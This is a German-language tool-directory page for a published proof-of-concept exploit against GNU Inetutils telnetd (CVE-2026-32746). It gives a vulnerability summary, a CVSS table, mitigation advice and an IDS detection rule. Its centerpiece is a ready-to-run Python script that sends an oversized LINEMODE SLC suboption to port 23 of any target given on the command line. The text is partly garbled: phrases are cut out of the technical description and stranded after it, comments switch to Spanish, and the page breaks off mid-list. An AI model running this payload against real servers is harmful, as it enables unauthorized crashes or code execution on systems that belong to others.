Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-32746 — Proof-of-Concept-Exploit für CVE-2026-32746, eine kritische Remote-Codeausführung-Schwachstelle in GNU Inetutils telnetd über einen LINEMODE-SLC-Pufferüberlauf. Enthält technische Analyse, CVSS-Metriken und Hinweise zur Schadensbegrenzung. | Kitploit
Tools/GitHubGitHub/kaleth4/cve-2026-32746
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungRed Teaming
GitHubkaleth4/cve-2026-32746

CVE-2026-32746

Proof-of-Concept-Exploit für CVE-2026-32746, eine kritische Remote-Codeausführung-Schwachstelle in GNU Inetutils telnetd über einen LINEMODE-SLC-Pufferüberlauf. Enthält technische Analyse, CVSS-Metriken und Hinweise zur Schadensbegrenzung.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2026-32746 GNU Inetutils Telnetd RCE

🔥 📌 Zusammenfassung

Kritische Schwachstelle | CVSS 9.8 | Remote Code Execution! Betrifft: GNU Inetutils Telnetd (Versionen vor 2.7) Typ: OOB Write im Handler für die LINEMODE SLC-Suboptionen Angriffsvektor: Netzwerk (Port 23) | Keine Authentifizierung erforderlich Auswirkung: RCE mit den Rechten des Telnetd-Prozesses


🎯 📖 Technische Beschreibung

In der Funktion add_slc des telnetd-Daemons von wurde ein identifiziert. Dieser Fehler ermöglicht es einem entfernten Angreifer, , indem er die des Telnet-Protokolls manipuliert.

GNU Inetutils
Pufferüberlauf durch Schreiben außerhalb der Grenzen (OOB Write)
beliebigen Code einzuschleusen
SLC-Suboptionen (Set Local Characters)

🔍 Wichtige Details

  • Verwundbare Funktion: add_slc (Verarbeitung lokaler Zeichen).
  • Grundursache: Fehlende Grenzwertprüfung im internen Puffer.
  • Ausnutzung: Massenhaftes Senden bösartiger LINEMODE SLC-Sequenzen.
  • Voraussetzungen: Keine (direkter Zugriff auf Port 23).

🛠️ 💻 Proof of Concept (PoC)

Ein Angreifer kann diese Schwachstelle mithilfe eines bösartigen Telnet-Payloads ausnutzen, das den internen Puffer überflutet:

root@kitploit:~
#!/usr/bin/env python3
import socket
import sys

# CVE-2026-32746 - LINEMODE SLC Overflow
# IAC SB LINEMODE SLC <list> IAC SE
IAC  = b'\xff'
SB   = b'\xfa'
SE   = b'\xf0'
LINEMODE = b'\x22'
SLC  = b'\x03'

target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"

# Payload generado para desbordar add_slc
malicious_slc = b"\x01\x03\x41" * 600  # Repetición de 600 veces

payload = IAC + SB + LINEMODE + SLC + malicious_slc + IAC + SE

print(f"[*] Enviando payload malicioso a {target}...")
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((target, 23))
    s.sendall(payload)
    print("[+] Payload entregado. Verificando caída del servicio/RCE...")

⚠️ ¡ADVERTENCIA! Este código es solo para fines educativos y de investigación. Su uso en sistemas sin autorización es ilegal.


📊 📈 Risikometriken (CVSS 3.1)

MetrikWertBeschreibung
VektorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:HRemote, ohne Authentifizierung
Bewertung9.8 (KRITISCH) 🔴Hohe Auswirkung auf Vertraulichkeit, Integrität und Verfügbarkeit
Veröffentlichung13. März 2026Letzte Änderung: 5. Mai 2026

🛡️ 🔒 Mitigation und Lösungen

🚀 Sofortige Lösung

✅ GNU Inetutils aktualisieren auf die gepatchte Version (post-2.7).

⚡ Workarounds

🔹 telnetd deaktivieren und auf SSH migrieren (empfohlen). 🔹 Port 23 in Perimeter-Firewalls blockieren. 🔹 IDS/IPS konfigurieren, um anomale LINEMODE SLC-Sequenzen zu erkennen.

🛡️ Zusätzliche Sicherheitskonfiguration

  • Snort/Suricata-Regeln:
    root@kitploit:~
    alert tcp any any -> any 23 (msg:"CVE-2026-32746 - LINEMODE SLC Overflow"; content:"|FF FA 22 03|"; depth:5; threshold:type both, track by_src, count 1, seconds 1; sid:1000001; rev:1;)
    
  • **
Tool herunterladen